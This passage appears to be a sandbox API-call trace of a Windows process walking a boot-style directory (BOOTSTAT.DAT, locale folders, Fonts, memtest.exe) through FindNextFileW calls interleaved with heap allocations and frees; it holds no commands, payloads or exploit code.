dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0093.783] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0093.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1c) returned 0x3330900 [0093.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332feb0 [0093.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.783] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0093.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x38) returned 0x3331b88 [0093.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0093.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332feb0 | out: hHeap=0x630000) returned 1 [0093.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330900 | out: hHeap=0x630000) returned 1 [0093.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330900 [0093.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.783] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0093.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x54) returned 0x3338dc8 [0093.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332feb0 [0093.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330428 [0093.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0093.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330900 | out: hHeap=0x630000) returned 1 [0093.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3331b88 | out: hHeap=0x630000) returned 1 [0093.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330900 [0093.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.784] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0093.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0093.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0093.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fdc0 [0093.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330770 [0093.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332feb0 | out: hHeap=0x630000) returned 1 [0093.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330428 | out: hHeap=0x630000) returned 1 [0093.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330900 | out: hHeap=0x630000) returned 1 [0093.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0093.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330900 [0093.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.784] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0093.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa8) returned 0x32b2de0 [0093.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330428 [0093.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332feb0 [0093.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33304a0 [0093.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330860 [0093.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0093.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fdc0 | out: hHeap=0x630000) returned 1 [0093.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330770 | out: hHeap=0x630000) returned 1 [0093.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330900 | out: hHeap=0x630000) returned 1 [0093.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0093.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330900 [0093.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.785] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0093.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330770 [0093.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.785] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0093.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xfc) returned 0x32b14c8 [0093.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fdc0 [0093.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0093.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330338 [0093.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33300e0 [0093.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fcd0 [0093.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330158 [0093.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330428 | out: hHeap=0x630000) returned 1 [0093.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332feb0 | out: hHeap=0x630000) returned 1 [0093.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33304a0 | out: hHeap=0x630000) returned 1 [0093.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330860 | out: hHeap=0x630000) returned 1 [0093.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330900 | out: hHeap=0x630000) returned 1 [0093.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330770 | out: hHeap=0x630000) returned 1 [0093.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0093.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330770 [0093.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.786] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0093.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330900 [0093.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.786] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0093.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330860 [0093.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.787] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0093.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16c) returned 0x9b94968 [0093.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33304a0 [0093.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332feb0 [0093.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330428 [0093.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fe38 [0093.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33306d0 [0093.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fcf8 [0093.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330388 [0093.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330720 [0093.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302c0 [0093.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fdc0 | out: hHeap=0x630000) returned 1 [0093.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0093.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330338 | out: hHeap=0x630000) returned 1 [0093.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33300e0 | out: hHeap=0x630000) returned 1 [0093.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fcd0 | out: hHeap=0x630000) returned 1 [0093.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330158 | out: hHeap=0x630000) returned 1 [0093.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330770 | out: hHeap=0x630000) returned 1 [0093.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330900 | out: hHeap=0x630000) returned 1 [0093.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330860 | out: hHeap=0x630000) returned 1 [0093.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0093.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330860 [0093.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.788] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0093.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330900 [0093.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.788] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0093.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330770 [0093.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.788] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0093.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330158 [0093.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.788] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0093.788] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0093.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x214) returned 0x32cef08 [0093.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fcd0 [0093.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33300e0 [0093.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330338 [0093.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0093.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fdc0 [0093.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330798 [0093.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330540 [0093.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0093.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0093.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0093.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330478 [0093.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330608 [0093.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330018 [0093.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33304a0 | out: hHeap=0x630000) returned 1 [0093.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332feb0 | out: hHeap=0x630000) returned 1 [0093.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330428 | out: hHeap=0x630000) returned 1 [0093.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fe38 | out: hHeap=0x630000) returned 1 [0093.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33306d0 | out: hHeap=0x630000) returned 1 [0093.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fcf8 | out: hHeap=0x630000) returned 1 [0093.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330388 | out: hHeap=0x630000) returned 1 [0093.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330720 | out: hHeap=0x630000) returned 1 [0093.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302c0 | out: hHeap=0x630000) returned 1 [0093.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330860 | out: hHeap=0x630000) returned 1 [0093.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330900 | out: hHeap=0x630000) returned 1 [0093.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330770 | out: hHeap=0x630000) returned 1 [0093.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330158 | out: hHeap=0x630000) returned 1 [0093.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b94968 | out: hHeap=0x630000) returned 1 [0093.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330158 [0093.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.790] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0093.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330770 [0093.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.790] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 